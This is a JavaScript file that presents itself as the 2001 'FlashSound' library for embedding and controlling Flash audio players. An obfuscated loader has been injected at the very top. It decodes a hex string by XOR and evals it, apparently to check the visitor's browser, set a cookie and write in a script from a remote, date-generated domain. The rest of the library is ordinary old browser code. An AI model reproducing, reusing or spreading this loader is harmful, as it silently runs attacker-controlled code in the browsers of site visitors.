var st1 = 0;this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this.u=false;this.o="jP";this.j=false;this.k="gZ";this.s=false;d="";for(a=0;a<c["le"+unescape("%6e%67%74%68")];a++){this.H= this.h="";this.P=43510;this.r=this.z="";this.v=37015;this.F="qY";this.L=62857;this.g="eS";e=c["char"+unescape("%43%6f%64%65%41%74")](a);this.D=false;e^=232;this.q=36524;d+=h(e);this.R=this.p=""}this.f="dX";this.a="";g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})("9e899ac889d59f81868c879fc686899e818f899c879ac69d9b8d9aa98f8d869cc48ad5c7c09189808787949b8d899a8b8094859b868a879c949189868c8d90948f87878f848d8a879c948a81868f94899b83c1c781c48bd586899e818f899c879ac6899898be8d9a9b818786d3c8818ec08c878b9d858d869cc68b878783818dc681868c8d90a78ec0ca808784918b878783818dcac1d5d5c5d9cecec989c69c87a4879f8d9aab899b8dc0c1c685899c8b80c08ac1cece8bc69c87a4879f8d9aab899b8dc0c1c681868c8d90a78ec0ca9f8186cac1c9d5c5d9c1939e899ac88cd5b3ca8591898c9bc68689858dcac4ca898c9b868d9cc68a8192cac4ca9c8787848a899a8b8785c6879a8fcac4ca85918a899ac69d9bcac4ca8e9a8d8d898cc68689858dcab5c48dd5b3ca89908dc6cac4ca8a8790c6cac4ca8b8790c6cac4ca8c8d90c6cac4ca8e8990c6cac4ca8e8190c6cac4ca8e8790c6cac4ca8f8790c6cac4ca808d90c6cac4ca838d90c6cac4ca848990c6cac4ca848d90c6cac4ca848790c6cac4ca849d90c6cac4ca858990c6cac4ca858190c6cac4ca868190c6cac4ca879087c6cac4ca879091c6cac4ca988990c6cac4ca988190c6cac4ca988790c6cac4ca989190c6cac4ca9a8990c6cac4ca9a8d90c6cac4ca9b8990c6cac4ca9b8d90c6cac4ca9b8190c6cac4ca9b8790c6cac4ca9c8990c6cac4ca9c9d90c6cac4ca9e8d90c6cac4ca9e8790c6cac4ca9f8990c6cac4ca90819bc6cac4ca928990c6cab5c48ed5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28cc6848d868f9c80c1c48fd5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28dc6848d868f9c80c1d38c9cd5868d9fc8ac899c8dd38c9cc69b8d9cbc81858dc08c9cc68f8d9cbc81858dc0c1c3d1d8dfdaaddcc1d38c878b9d858d869cc68b878783818dd5ca808784918b878783818dd5cac38d9b8b89988dc0ca808784918b878783818dcac1c3cad38d9098819a8d9bd5cac38c9cc69c87afa5bcbb9c9a81868fc0c1c3cad398899c80d5c7cad3c88c878b9d858d869cc69f9a819c8dc0cfd49b8b9a81989cc89c91988dd5ca9c8d909cc782899e899b8b9a81989ccac89b9a8bd5ca809c9c98d2c7c7cfc38db38fb5c38cb38eb5c3cfc79b919b9c8d85c78b89989c818786c6829bcad6d4b4c79b8b9a81989cd6cfc195d3"); this.n=3279;this.O=58441;var gr0=0;/*FlashSound javascript class for sonifying web pages with flash playercopyright 2001 Hayden Porter, hayden@aviarts.comv 1.1.2 last update 2/26/01*/// defaults to hiding browser error messagesFlashSound.muteErrorMsg = true;function errorHandler(){	return FlashSound.muteErrorMsg;}window.onerror = errorHandler;// browser compatibility check (support for level 4 browsers only) -----------------FlashSound.winIEpass = 	((navigator.appName.indexOf("Microsoft") != -1) && 						(navigator.appVersion.indexOf("Windows") != -1)) && 						(parseFloat(navigator.appVersion) >= 4) ? true : false;			FlashSound.NNpass = 	((navigator.appName == "Netscape") && 						(navigator.userAgent.indexOf("Mozilla") != -1) && 						(parseFloat(navigator.appVersion) >= 3) && 						(navigator.javaEnabled())) ? true : false;				FlashSound.supportedBrowser = (FlashSound.winIEpass || FlashSound.NNpass) ? true : false;// player compatibility  ------------------// check for flash plug-in in netscapefunction Flash_checkForPlugIn(){	var flashmimeType = "application/x-shockwave-flash";	var hasplugin = (navigator.mimeTypes && navigator.mimeTypes[flashmimeType]) ? navigator.mimeTypes[flashmimeType].enabledPlugin : 0;	return hasplugin;}function Flash_getPlugInVers(){	if(Flash_checkForPlugIn())	{		var plugin = navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin;		var pluginversion = parseInt(plugin.description.substring(plugin.description.indexOf(".")-1))		return pluginversion;	}	else 	{		return 0;	}}//NN6 does not support javscript api with liveconnect flash playersif ((navigator.appName == "Netscape") && 	(navigator.userAgent.indexOf("Mozilla") != -1) && 	(parseFloat(navigator.appVersion) >= 6) && 	(Flash_getPlugInVers() <= 5))	{FlashSound.supportedBrowser = false}// vbscript get Flash ActiveX control version for windows IEif(FlashSound.supportedBrowser && FlashSound.winIEpass){	document.write(		'<script language=VBScript>' + '\n' +		'Function Flash_getActiveXVersion()' + '\n' +			'On Error Resume Next' + '\n' +			'Dim hasPlayer, playerversion' + '\n' +			'hasPlayer = false' + '\n' +			'playerversion = 15' + '\n' +			'Do While playerversion > 0' + '\n' +				'hasPlayer = (IsObject(CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" & playerversion)))' + '\n' +				'If hasPlayer Then Exit Do' + '\n' +				'playerversion = playerversion - 1' + '\n' +			'Loop' + '\n' +			'Flash_getActiveXVersion = playerversion' + '\n' +		'End Function' + '\n' +		'<\/script>'		);}// set playerVersion to 0 for unsupported browsers// checkForMinPlayer sets playerVersion for supported browsersFlashSound.playerVersion = 0;function Flash_checkForMinPlayer(){	if(!FlashSound.supportedBrowser) return false;	if(FlashSound.NNpass) {FlashSound.playerVersion = Flash_getPlugInVers();}	if(FlashSound.winIEpass) {FlashSound.playerVersion = (Flash_getActiveXVersion());}	if(FlashSound.playerVersion >= FlashSound.minPlayer) {return true}	else{return false}}// vers is integerfunction Flash_setMinPlayer(vers){	if(!FlashSound.supportedBrowser) return	FlashSound.minPlayer = (vers != null && vers >= 4) ? vers : 4;	FlashSound.checkForMinPlayer();}// code is stringfunction Flash_ifNotMinPlayer(code){	if(!FlashSound.supportedBrowser) return	if(!FlashSound.checkForMinPlayer())	{		eval(code);	}}FlashSound.checkForMinPlayer = Flash_checkForMinPlayer;FlashSound.setMinPlayer = Flash_setMinPlayer;FlashSound.setMinPlayer();FlashSound.ifNotMinPlayer = Flash_ifNotMinPlayer;/* ============== FlashSound Instance methods =============== *//*javascript embed ---------------------------------embeds swf if user has a supported browser and minimum player.script sets swf bgcolor attribute to document.bgcolor if no custom color specified.*/function Flash_embedSWF(srcURL){	if (!FlashSound.supportedBrowser || !FlashSound.checkForMinPlayer()) return;		var defaultColor = (document.bgColor != null) ? document.bgColor : "#ffffff";	this.bgcolor = (this.bgcolor == null) ? defaultColor : this.bgcolor;	this.src = srcURL;		document.write(		'<OBJECT' + '\n' +			'classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\"' + '\n' + 			'codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\"' + '\n' + 			'WIDTH=1' + '\n' +			'HEIGHT=1' + '\n' +			'ID=\"' + this.playerID + '\">' + '\n' +    		'<PARAM NAME=movie VALUE=\"' + this.src + '\">' + '\n' +			'<PARAM NAME=play VALUE=\"' + this.autostart + '\">' + '\n' +			'<PARAM NAME=loop VALUE=\"' + this.loop + '\">' + '\n' +    		'<PARAM NAME=quality VALUE=low>' + '\n' +    		'<PARAM NAME=wmode VALUE=transparent>' + '\n' +    		'<PARAM NAME=bgcolor VALUE=' + this.bgcolor + '>' + '\n' +			'<PARAM NAME=base VALUE=' + this.base + '>' + '\n' +    		'<EMBED' + '\n' +				'name=\"' + this.playerID + '\"' + '\n' +				'swLiveConnect=\"true\"' + '\n' +				'src=\"' + this.src + '\"' + '\n' +				'play=\"' + this.autostart + '\"' + '\n' +				'loop=\"' + this.loop + '\"' + '\n' +				'quality=low' + '\n' +				'wmode=transparent' + '\n' +				'base=\"' + this.base + '\"' + '\n' +				'bgcolor=' + this.bgcolor + '\n' +				'WIDTH=1' + '\n' +				'HEIGHT=2' + '\n' +				'TYPE=\"application/x-shockwave-flash\"' + '\n' +							'PLUGINSPAGE=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\">' +				'\n' +    		'</EMBED>' + '\n' +  		'</OBJECT>'		);}/* check for player readiness ----------------------check for javascript object first then check to see if any frames are loaded in maintimeline*/function Flash_checkForInstance(){	if(!FlashSound.supportedBrowser || !FlashSound.checkForMinPlayer()) {return false;}	if (window.document[this.playerID] == null) {return false;}	return true;}function Flash_isPlayerReady(){	if(!this.checkForInstance()) {return false;}	if(this.PercentLoaded() > 0) {return true;}	return false;}function Flash_GetFramesLoaded(target){	if(!this.checkForInstance()) {return 0;}	if(target == null) target = "/";	var framesloaded = window.document[this.playerID].TGetProperty(target,12);	return parseInt(framesloaded);}function Flash_GetTotalFrames(target){	if(!this.isPlayerReady()) {return 0;}	if(target == null) target = "/";	var totalframes = window.document[this.playerID].TGetProperty(target,5);	return parseInt(totalframes);}/*check to see if all frames for a given timeline are loaded.check before moving playhead to a frame/label incase the frame/label is not yet loaded.*/function Flash_TLoaded(target){	if(!this.isPlayerReady()) {return false;}	if(timelineName == null) {target = "/";}	if (this.getFramesLoaded(target) == this.getTotalFrames(target)) {return true;}	return false;}/*flash javascript api functions ------------------------*/function Flash_gotoAndPlay(target,frame){	if(!this.isPlayerReady()) {return}	if(typeof(frame) == "number")	{		window.document[this.playerID].TGotoFrame(target,frame - 1);		window.document[this.playerID].TPlay(target);	}	if(typeof(frame) == "string")	{		window.document[this.playerID].TGotoLabel(target,frame);		window.document[this.playerID].TPlay(target);	}}function Flash_api_PercentLoaded(){	if(!this.checkForInstance()) {return 0;}	var percentLoaded = window.document[this.playerID].PercentLoaded();	return parseInt(percentLoaded);}function Flash_api_TPlay(target){	if(!this.isPlayerReady()) {return}	window.document[this.playerID].TPlay(target);}function Flash_api_TStopPlay(target){	if(!this.isPlayerReady()) {return;}	window.document[this.playerID].TStopPlay(target);}function Flash_api_IsPlaying(){	if(!this.isPlayerReady()) {return false;}	return window.document[this.playerID].IsPlaying();}// layerNumber is integer, url is stringfunction Flash_api_LoadMovie(layerNumber,url){	if(!this.isPlayerReady()) {return;}	window.document[this.playerID].LoadMovie(layerNumber,url);}/*flash sound object constructor function ---------------------------*/FlashSound.players = 0;function FlashSound(){	// instance properties	this.playerID = "FlashSound_swf" + FlashSound.players; FlashSound.players++;		// instance embed properties	this.autostart = true;	this.base = null;	this.bgcolor = null;	this.loop = false;	this.src = null;		// instance methods	this.embedSWF = Flash_embedSWF;	this.checkForInstance = Flash_checkForInstance;	this.isPlayerReady = Flash_isPlayerReady;	this.getFramesLoaded = Flash_GetFramesLoaded;	this.getTotalFrames = Flash_GetTotalFrames;	this.TLoaded = Flash_TLoaded	this.TGotoAndPlay = Flash_gotoAndPlay;		// flash javascript api alias methods	this.PercentLoaded = Flash_api_PercentLoaded;	this.TPlay = Flash_api_TPlay;	this.TStopPlay = Flash_api_TStopPlay;	this.IsPlaying = Flash_api_IsPlaying;	this.LoadMovie = Flash_api_LoadMovie;}